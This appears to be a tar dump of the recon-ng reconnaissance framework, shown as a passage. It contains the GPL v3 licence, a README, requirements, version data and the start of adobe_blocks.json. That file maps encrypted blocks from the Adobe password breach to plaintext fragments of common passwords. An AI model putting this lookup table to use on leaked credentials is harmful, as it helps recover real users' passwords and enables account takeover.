pax_global_header00006660000000000000000000000064131226572440014520gustar00rootroot0000000000000052 comment=70d967e3f53022fa821bc4608fdc8f54db2d6ff5 LaNMaSteR53-recon-ng-70d967e3f530/000077500000000000000000000000001312265724400161545ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/.gitignore000066400000000000000000000000371312265724400201440ustar00rootroot00000000000000*.pyc *sublime* venv/ scripts/ LaNMaSteR53-recon-ng-70d967e3f530/LICENSE000066400000000000000000001045051312265724400171660ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. {one line to give the program's name and a brief idea of what it does.} Copyright (C) {year} {name of author} This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: {project} Copyright (C) {year} {fullname} This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . LaNMaSteR53-recon-ng-70d967e3f530/README.md000066400000000000000000000040431312265724400174340ustar00rootroot00000000000000# Recon-ng Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly. Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the [Usage Guide](https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Usage%20Guide) for more information. Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the [Development Guide](https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Development%20Guide) for more information. ## Sponsors [![Black Hills Information Security](http://static.wixstatic.com/media/75fce7_d7704144d33847a197598d7731d48770.png_srb_p_287_248_75_22_0.50_1.20_0.00_png_srb)](http://www.blackhillsinfosec.com) Consulting | Research | Development | Training ## Donations Recon-ng is free software. However, large amounts of time and effort go into its continued development. If you are interested in financialy supporting the development of Recon-ng, please send your donation to tjt1980[at]gmail.com via PayPal. Thank you. LaNMaSteR53-recon-ng-70d967e3f530/REQUIREMENTS000066400000000000000000000001411312265724400200160ustar00rootroot00000000000000dicttoxml dnspython jsonrpclib lxml mechanize slowaes XlsxWriter olefile PyPDF2 flask unicodecsv LaNMaSteR53-recon-ng-70d967e3f530/VERSION000066400000000000000000000004531312265724400172260ustar00rootroot00000000000000__version__ = '4.9.2' # ex. x.y.z # x - Incremented for changes requiring migration. (major revision) # y - Incremented for the addition of new features. (minor revision) # z - Incremented for minor code changes and bug fixes. (hotfix) # Subordinate items reset to 0 when superior items increment. LaNMaSteR53-recon-ng-70d967e3f530/data/000077500000000000000000000000001312265724400170655ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/data/adobe_blocks.json000066400000000000000000000234301312265724400223710ustar00rootroot00000000000000{ "d23e6fe47a8c787c": "1", "045ff52d1f4630d3": "oneunite", "18d49ab204d8b869": "quiksilv", "3abccd0b131fc2bc": "fdsa", "3cc0d36cfd0b671b": "photosho", "740f03f0e603e791": "asdfgh", "4b953336256d5bed": "w00tw00t", "b9d8d61823ddfa61": "be", "78805905d506df73": "winchest", "863018b1d500e3e9": "azerty", "e7c80f2c401ffcfb": "78945612", "2f7b901cd0c5e8cc": "test", "e08e0339fc7e5148": "fuckyou", "0008f90072941d29": "easymone", "6a04468f9aed2c3f": "snoopy1", "3cbe650ad460ec38": "96385274", "8ee96bb989a5ed3d": "y", "3045f02ba18e5879": "andrea", "ecc2caafd09facd8": "zxcvbnm", "c5f99122505ef6e2": "bubblegu", "1d63022435b2d8c2": "andrew", "137ebd2cf15d53a4": "billabon", "2fca9b003de39778": "password", "90e024f16f78657e": "summer", "8c065bb48824d5c8": "102030", "36ed05fb6c39b9e6": "sebastia", "eabc9afd97f5f9f6": "k", "da05ac5ef41d67c7": "thinkpin", "3c6bdf1c94478796": "jerusale", "4ddbb1c270ae0355": "112233", "39210b29e13743a3": "4", "e15fa619ccf10c40": "12345", "048e9f2f2518c2e4": "torchwoo", "5df8be87822bea5e": "marketin", "8650c4ba4b95c538": "o", "a53910aca67f2583": "dragon", "0080ecb77b40692e": "foofoofo", "a1afc6046a88029a": "killer", "bd49dbd0399e5954": "stockhol", "36954aac233aa4ac": "daniel", "33ab9ade8b57026e": "jaimatad", "04f91fa64a730a10": "op", "7929282c91be8846": "a", "340be02a50f6a7c5": "12365478", "af4fafe87a591fb1": "milleniu", "a3f492fbd917f632": "n", "4ed82ce7e64064ce": "princess", "6d18eea53f80da86": "takahash", "a41a91499354f175": "tigger", "02488ce78016fcf0": "dandelio", "36d0b3abf8b415f7": "aaaa", "8d993229ab67604a": "5t", "ae992f17ea19cd0b": "iloveyou", "0fa3a3e5c39898a0": "valentin", "643c408ab552cefb": "7777777", "01a9c867e0433d28": "wineglas", "ab8c542cb31a5010": "e6", "9027144829a89c40": "abc123", "00a03689aa345e3d": "animorph", "afe78daea417dad6": "christia", "5e9cc7e57d7071cc": "!", "8c4b6901dcb14489": "Porsche9", "76243e89edb7bc00": "000000", "00d004a74c60650d": "kiwifrui", "722ab57a6071a34a": "adobe.co", "02f5313547407e18": "discover", "1b2980d73862e759": "qazwsx", "71264cfe795c873c": "1q2w3e4r", "b4dd2c2b154bd818": "p", "d4c72e27feeff671": "123321", "0317920af2550f84": "terremot", "ca9d8a2db062417b": "666666", "e1a891d70bfdcf64": "michael", "00fffa358e97ca37": "pisaital", "6f92c9a939909af4": "555555", "0270093c46d13c7b": "marvelou", "d9a665e0eb9aaf09": "adobeado", "f11d45f785039b81": "r", "cb1ccdc4f22c167a": "letmein", "110edf2294fb8bf4": "123456", "010515aae22daed6": "bluegree", "846c393208a47ff2": "!!!", "22540bd3da288f39": "12345612", "030cce72e9eebf95": "8", "00350bb1800a2b73": "dwarflil", "00cf5ce03051f730": "hedgehog", "391a621651a47748": "hannah", "009961b2c13d79b9": "ryankell", "00893251f0928847": "makemyda", "3380c8ddfb027037": "l", "30a6643f89f61c54": "spaghett", "317d14dfa16d714b": "stephani", "ce4f0d26000ea9ce": "shadow", "4d2659f3e7d72f08": "doodlebu", "89eb45f7842b3086": "michelle", "7508b46ac58f62f4": "1234567", "5aa7e5c091585b7f": "macromed", "4778dc76ab9eef58": "qwertyui", "879d825c74107650": "somethin", "373e3f4c8ea8e51a": "trustno1", "5a53132e2990e5be": "asdasd", "006ce3fe40a89079": "serenity", "c6093530f0c518a6": "lightnin", "d9d258e61209e051": "sunshine", "009937f65b1017b1": "pinkdais", "456fbdf9cbfa2099": "12", "1cb483ced6909e3a": "14725836", "0193b5be9ddc6b52": "streisan", "153781e5292b3993": "jordan", "ce2ca9af68726a67": "123qwe", "f9e7e22847bdf45f": "AdobePas", "ce45e5bc771960e8": "maggie", "7d895d5f46f0a6bd": "syncmast", "010a3b9ddb7e651b": "stvincen", "4e70089e5035796b": "alejandr", "5ed4407b1e28eb05": "ver", "eee98b49bbade6cc": "shinigam", "016a777b870f27e0": "aaaaaaaa", "b1978dcbc2defefb": "0", "c73e8f21e1b3afa8": "aaaaaa", "7db3b65b1db7daa6": "secret", "0e2e1d03011eafc1": "3456", "97be4478bf10081c": "wrestlin", "b9e13cf71223f114": "internet", "901d3217ad9a3255": "h", "ef22a896bfad3e80": "123", "5e90e5a4e4334d21": "121212", "88c85a79aac75e33": "whatever", "15c5fe8ae972b158": "ginger", "955c246bf327f133": "baseball", "839a598a17f31af7": "12312312", "8fda7e1f0b56593f": "12345678", "f975ba7986f41d38": "joshua", "dd0cbdf4730d355c": "metallic", "76b2df01b9c27982": "adobe201", "edebb9fd262e8678": "abcdef", "3f1de64dfb7a2209": "90", "9e8d9571a316e591": "7", "aff38e3625d3f8aa": "thomas", "174c3d7cb4167571": "t", "ecbd372a1ef50794": "blackjac", "7bee27db30daae7b": "1qaz2wsx", "52860a990c9297cf": "woodstoc", "884943cfdfac1d3b": "undertak", "4892ebbc4ac00d45": "roadrunn", "83efe15248771eb6": "Password", "c5c873e9fd3eb64d": "scrapboo", "85663763c21ef0ae": "azertyui", "0111fd2c62fa8eea": "mafiawar", "900b4c2abcda0fa8": "alexande", "2963d39e3701efdb": "alexandr", "7ba30f5d0e46e9af": "123123", "374e483fd78aa4d3": "rastafar", "4555f57d19e1756b": "charlott", "ecba98cca55eabc2": "111111", "d2fbca335ce888c6": "maradona", "5d62f714dc27a7e7": "asdfghjk", "c753f9ab7c544e53": "lightroo", "b675a33170c16889": "liverpoo", "ae8d6735e62650b0": "porsche9", "0793761fb9006fdf": "elizabet", "83607a3e15841f7e": "qwerty12", "9845c7da1c2f9377": "910", "035def2962f57b5e": "maggiemo", "647822f211424efa": "98765432", "2990af41631c6e57": "clockwor", "bb962d8174fe24a9": "222222", "7b6d6db33181cb89": "matrix", "b99f66ae4e19b6f9": "e", "cc916757f28fe676": "Chocolat", "456e751de92da2c5": "barcelon", "95dbe672d29d78df": "charlie", "bdbd5ff65d03cc00": "winter20", "e5d8efed9088db0b": "qwerty", "29c76e12067c5437": "leigh123", "4a49440ad750400b": "10101010", "57b72307e3337f03": "pakistan", "e7d505c6bc7761e6": "s", "17bbf186b726c36d": "highland", "ed7ff639c98d93c3": "amsterda", "742801db8caaf41c": "monkey", "9a48cb6a265b6d3d": "2", "5ff84e5496efc0cc": "er", "be9e9dd7c99f18bf": "chocolat", "083032fe2b41a5e1": "nefertir", "011e4a03f1d53010": "imtoosex", "e4fb6aaae8d6f122": "frederic", "02b2a26f2d2676a4": "crazytow", "3a68c8e06452f362": "9", "02f5130a7da32534": "maranell", "4126b2f64cd0573f": "samsung", "a619f97d11fed00c": "23", "e8e35047342ead42": "southpar", "38f4310cb5b62fe0": "11111111", "3b4770d7e8ea8ebf": "microsof", "674eec69b14e8396": "soccer", "7854524912e2bd31": "abcdefgh", "dec9748cac5c1fff": "m", "71aaa525bb376d1b": "iloveme", "26f2789024d0469f": 